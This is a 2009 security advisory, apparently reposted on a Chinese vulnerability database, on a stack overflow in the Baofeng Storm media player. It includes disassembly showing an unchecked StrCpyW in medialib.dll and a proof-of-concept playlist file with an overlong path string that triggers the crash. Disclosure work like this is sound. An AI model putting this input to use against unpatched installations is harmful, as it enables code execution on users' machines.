Baofeng Media Player playlist stack overflow vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1051842 漏洞类型
发布时间 2009-06-29 更新时间 2009-06-29
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009060069
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Baofeng Media Player playlist stack overflow vulnerability

By Jambalaya of Nevis Labs
Date: 2009.06.24

Vender:
Baofeng

Affected:
Storm 3.9.62
*Other version may also be affected

Overview:
Baofeng is a widely popular media player in China, and it plays many common
media file formats. There are almost 120 million customer using baofeng
media player in China.

Details:
The specific flaws exists in medialib.dll. the stack overflow vulnerablility
is due to the way it incorrectly handle smpl file type which is a
playlist.Succssfully exploiting this vulnerability allows attackers to
execute arbitrary code on vulnerable installation.

the vulnerability could be triggered when it pass a long path, and lack
legal examine on the length of path£º

.text:1000567B ; int __stdcall sub_1000567B(LPCWSTR pszUrl,DWORD pcchPath)
.text:1000567B sub_1000567B    proc near               ; DATA XREF:
.rdata:100248D4o
.text:1000567B
.text:1000567B FileName        = word ptr -628h
.text:1000567B var_10          = dword ptr -10h
.text:1000567B var_C           = dword ptr -0Ch
.text:1000567B var_4           = dword ptr -4
.text:1000567B pszUrl          = dword ptr  8
.text:1000567B pcchPath        = dword ptr  0Ch
.text:1000567B
.text:1000567B                 mov     eax, offset sub_100221F8
.text:10005680                 call    __EH_prolog
.text:10005685                 sub     esp, 61Ch
.text:1000568B                 push    ebx
.text:1000568C                 push    esi
.text:1000568D                 mov     esi, [ebp+pszUrl]
.text:10005690                 mov     [ebp+var_10], ecx
.text:10005693                 test    esi, esi
.text:10005695                 jz      loc_1000577D
.text:1000569B                 mov     ebx, [ebp+pcchPath]
.text:1000569E                 test    ebx, ebx
.text:100056A0                 jz      loc_1000577D
.text:100056A6                 push    edi
.text:100056A7                 push    esi             ; pszPath
.text:100056A8                 xor     edi, edi
.text:100056AA                 mov     [ebp+pcchPath], 208h
.text:100056B1                 call    ds:PathIsURLW
.text:100056B7                 test    eax, eax
.text:100056B9                 jz      short loc_100056E0
.text:100056BB                 push    3               ; UrlIs
.text:100056BD                 push    esi             ; pszUrl
.text:100056BE                 call    ds:UrlIsW
.text:100056C4                 test    eax, eax
.text:100056C6                 jz      short loc_100056E0
.text:100056E0 loc_100056E0:                           ; CODE XREF:
sub_1000567B+3Ej
.text:100056E0                                         ; sub_1000567B+4Bj
.text:100056E0                 lea     eax, [ebp+FileName]
.text:100056E6                 push    esi
.text:100056E7                 push    eax
.text:100056E8                 call    ds:StrCpyW
<---------------------strcpy directly with out any examiation.

Proof of concept&#163;&#186;
<playlist><item name="2.GIF" source="C:Documents and
SettingsLinlin&#192;&#195;&#230;2.GIF" duration="0"/><item name="0001.gif"
source="C:Documents and
SettingsLinlin&#192;&#195;&#230;rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhgggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeedddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaawwwwwwwwwwwwwjjjjjjjjjjjjjjjjjpppppppppppppppptttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.gif"
duration="0"/></playlist>


Greetz to those friends who I have long time no see T_T&#163;&#186;Pratik Dixit, Sanjay
pendse, Winny Thomas, ajit.hatti

Vendor Response:
2009.06.16 Vendor notified via email
2009.06.25 Vendor release new version